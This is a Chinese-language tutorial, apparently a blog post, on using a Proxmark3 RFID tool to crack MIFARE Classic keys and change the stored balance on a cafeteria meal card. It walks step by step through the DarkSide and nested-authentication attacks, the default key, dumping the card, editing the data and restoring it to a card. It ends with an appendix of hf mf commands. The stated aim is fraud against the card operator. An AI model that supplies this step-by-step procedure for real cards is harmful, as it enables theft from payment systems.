proxmark3之改饭卡金额
对于无线射频卡RFID小弟有所研究今日分享一篇关于修改饭卡金额的文章
如果对ID,IC卡还不是很了解先看看raidwar的文章把,驱动什么的请自行百度
以及命令帮助
使用Proxmark3进行MIFARE Classic卡的安全测试
以及数据分析
下面进入正题
首先
驱动装好之后可以看到设备管理器中查看 发现proxmark3使用是COM5端口
proxmark3.exe COM5
hw tune
成功后如下显示
此时讲自己的高频卡放上去然后直接使用命令
hf mf mifare
如果
找到 validkey 则直接使用命令:
(必须知道一个正确的Key方可进行相关的操作)
hf mf nested 1 0 A ffffffffffff
基于验证漏洞进行全卡区域Key破解
如果结果为
则 再次进行漏洞循环破解
hf mf mifare 524bb6a2
直到找到正确密码为止(显示Found valid key)
找到密码后使用(测试嵌套认证漏洞,基于一个已知Key,获取都有扇区Keys)
hf mf nested 1 0 A ffffffffffff d
导出密码二进制文件,接着使用
hf mf dump
dump数据到bin文件 后分析修改数据后再次导入
使用命令以二进制方式恢复数据到空白的MIFARE classic卡
hf mf restore
完成
附录
hf mf (MIFARE卡的相关命令...)
help显示帮助
dbg设置默认调试模式
rdbl读取MIFARE classic卡的区块数据
rdsc读取MIFARE classic卡的扇区数据
dump导出MIFARE classic卡的数据到二进制文件
restore从二进制文件恢复数据到空白的MIFARE classic卡
wrbl改写MIFARE classic卡的区块数据
chk测试MIFARE classic卡的各个区块KEY A/B
mifare基于PRNG漏洞,执行mifare “DarkSide”攻击操作
nested测试嵌套认证漏洞,基于一个已知Key,获取都有扇区Keys
sniff嗅卡片与读写器之间的通讯(等同于hf 14a snoop)
sim模拟一个MIFARE卡片
eclr清除仿真内存的各区块数据
eget获取仿真内存的各区块数据
eset设置仿真内存的各区块数据
eload从导出的文件加载仿真数据
esave导出保存仿真数据到文件
ecfill利用仿真器的keys来填补仿真内存
ekeyprn打印输出仿真内存中的keys
csetuid直接设置可改UID卡的UID
csetblk把对应区块数据写入UID卡
cgetblk读取UID卡对应区块数据
cgetsc读取UID卡对应扇区数据
cload写入dump数据到UID卡。注意
csave保存UID卡数据到文件或者仿真内存